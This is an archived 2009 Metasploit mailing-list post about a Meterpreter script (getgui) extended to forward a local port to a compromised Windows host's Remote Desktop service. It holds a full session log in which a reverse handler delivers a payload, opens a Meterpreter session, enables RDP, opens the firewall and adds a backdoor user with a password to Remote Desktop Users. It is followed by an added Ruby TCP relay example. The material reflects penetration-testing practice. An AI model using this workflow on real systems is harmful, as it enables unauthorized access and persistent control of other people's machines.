Metasploit mailing list archives
Meterpreter script for enabled Remote Desktop
From: natron at invisibledenizen.org (natron)
Date: Sat, 3 Jan 2009 17:54:33 -0600
I extended this a tad to automatically forward a local port to the remote 3389 service. I copied in the relevant code from lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb and it seems to work just fine.

FYI, any accounts created through use of the getgui script only have user access on the machine; you'll still want to manually drop it into any groups you like.

-n

[*] Handler binding to LHOST 192.168.206.128
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.206.128:4444 -> 192.168.206.1:2014)

meterpreter > run getgui -h
Windows Get GUI Meterpreter Script by Darkoperator
Carlos Perez carlos_perez at darkoperator.com
Usage: getgui -u <username> -p <password> -n <lport>

OPTIONS:

    -h <opt>  Help menu.
    -n <opt>  The local port used to forward traffic to the enabled remote desktop port.
    -p <opt>  The Password of the user to add.
    -u <opt>  The Username of the user to add.

Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
Carlos Perez carlos_perez at darkoperator.com
Usage: getgui -u <username> -p <password> -n <lport>

OPTIONS:

    -h <opt>  Help menu.
    -n <opt>  The local port used to forward traffic to the enabled remote desktop port.
    -p <opt>  The Password of the user to add.
    -u <opt>  The Username of the user to add.
meterpreter > run getgui -n 53389 -u rdpuser -p rdppassword
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez at darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: rdpuser with Password: rdppassword
[*] Adding User: rdpuser to local group Remote Desktop Users
[*] You can now login with the created user
[*] Local TCP relay created: 0.0.0.0:53389 <-> 127.0.0.1:3389
meterpreter >

2009/1/2 Carlos Perez <carlos_perez at darkoperator.com>:
> Glad you guys liked my scripts. For updates on the scripts I tend to post them in my blog, in the forum for Remote-exploit and the forums at pauldotcom.com
>
> 2009/1/2 Rob Fuller <mubix at room362.com>
>> Darkoperator also made a windows enumeration script.
>> http://forum.pauldotcom.com/viewtopic.php?id=151
>>
>> 2009/1/2 H D Moore <hdm at metasploit.com>
>>> Nice implementation by Carlos Perez:
>>> http://forums.remote-exploit.org/showthread.php?t=19205
>>>
>>> _______________________________________________
>>> http://spool.metasploit.com/mailman/listinfo/framework
-------------- next part --------------
A non-text attachment was scrubbed...
Name: getgui.rb
Type: application/octet-stream
Size: 5988 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090103/2a405d6a/attachment.obj>
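The "Local TCP relay" line in the session above is what the portfwd code borrowed from net.rb produces: a listener on the attacker side whose accepted connections are paired with connections to the target's 3389. The block below is an added example, not natron's getgui.rb, not the Metasploit net.rb code it borrows from, and not any other Metasploit code. It is a stand-alone Ruby relay of the same shape, with two assumptions so it runs offline: the peer side is a plain socket (in Meterpreter it would be a TCP client channel routed through the session), and a constructed loopback echo server stands in for the target's RDP service. The sample traffic is a constructed RDP X.224 connection request, pure bytes with no RDP stack behind them.

```ruby
require 'socket'

# Added example, not code from getgui.rb or Metasploit: a minimal local TCP
# relay of the kind Meterpreter's portfwd reports ("Local TCP relay created:
# 0.0.0.0:53389 <-> 127.0.0.1:3389"). Each connection accepted on the listen
# port gets a fresh connection to the peer, and bytes are pumped both ways
# until either side hangs up. Assumption: the peer is a plain socket; in
# Meterpreter it would be a TCP client channel through the session.
class LocalRelay
  attr_reader :port

  def initialize(lhost, lport, peer_host, peer_port)
    @server   = TCPServer.new(lhost, lport)
    @port     = @server.addr[1]        # actual port, useful when lport == 0
    @peer     = [peer_host, peer_port]
    @workers  = []
    @acceptor = Thread.new { accept_loop }
  end

  def stop
    @server.close                      # makes accept raise, ending the loop
    @acceptor.join
    @workers.each { |t| t.join(2) }
  end

  private

  def accept_loop
    loop do
      client = @server.accept
      @workers << Thread.new(client) { |c| relay(c) }
    end
  rescue IOError, Errno::EBADF
    nil                                # server socket closed by #stop
  end

  # Pump src -> dst until src hits EOF, then half-close dst so the far end
  # sees the EOF too; the opposite pump keeps running until it sees its own.
  def pump(src, dst)
    IO.copy_stream(src, dst)
  rescue IOError, Errno::ECONNRESET, Errno::EPIPE
    nil
  ensure
    dst.close_write rescue nil
  end

  def relay(client)
    peer = TCPSocket.new(*@peer)
    [Thread.new { pump(client, peer) },
     Thread.new { pump(peer, client) }].each(&:join)
  ensure
    [client, peer].compact.each { |s| s.close rescue nil }
  end
end

# Constructed stand-in for the target's 3389 listener: an echo server on a
# loopback port chosen by the OS. Returns [server_socket, thread, port].
def start_echo_server
  srv = TCPServer.new('127.0.0.1', 0)
  thread = Thread.new do
    loop do
      conn = srv.accept
      Thread.new(conn) do |c|
        IO.copy_stream(c, c) rescue nil
        c.close rescue nil
      end
    end
  rescue IOError, Errno::EBADF
    nil
  end
  [srv, thread, srv.addr[1]]
end

# Constructed sample of the first thing an RDP client sends: a TPKT header
# (version 3, length 19) carrying an X.224 Connection Request with an
# RDP_NEG_REQ. Just bytes, so the relay's binary-cleanliness gets exercised.
RDP_X224_CR = "\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00".b

# Push payload through a relay into the echo server and return what comes
# back; for a correct relay this equals the payload byte for byte.
def relay_roundtrip(payload)
  srv, echo_thread, echo_port = start_echo_server
  relay = LocalRelay.new('127.0.0.1', 0, '127.0.0.1', echo_port)
  sock  = TCPSocket.new('127.0.0.1', relay.port)
  sock.write(payload)
  sock.close_write                     # our EOF propagates through both pumps
  sock.read.b
ensure
  sock&.close
  relay&.stop
  srv&.close
  echo_thread&.join
end

if __FILE__ == $PROGRAM_NAME
  echoed = relay_roundtrip(RDP_X224_CR)
  puts "relayed #{echoed.bytesize} bytes, intact: #{echoed == RDP_X224_CR}"
end
```

Two things worth noting against the session output. The relay there binds 0.0.0.0:53389, so the forwarded RDP port is reachable by anyone who can reach the attacker host, not just the local mstsc; binding 127.0.0.1 (as the example does) keeps it private unless you mean to share it. And the half-close handling in `pump` is what lets a client disconnect cleanly: without propagating EOF to the other leg, the peer connection lingers until the target's idle timeout.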
Current thread:
- Meterpreter script for enabled Remote Desktop H D Moore (Jan 02)
- Meterpreter script for enabled Remote Desktop Rob Fuller (Jan 02)
- Meterpreter script for enabled Remote Desktop Carlos Perez (Jan 02)
- Meterpreter script for enabled Remote Desktop natron (Jan 03)
- Meterpreter script for enabled Remote Desktop Carlos Perez (Jan 03)
- Meterpreter script for enabled Remote Desktop Carlos Perez (Jan 02)
- Meterpreter script for enabled Remote Desktop Rob Fuller (Jan 02)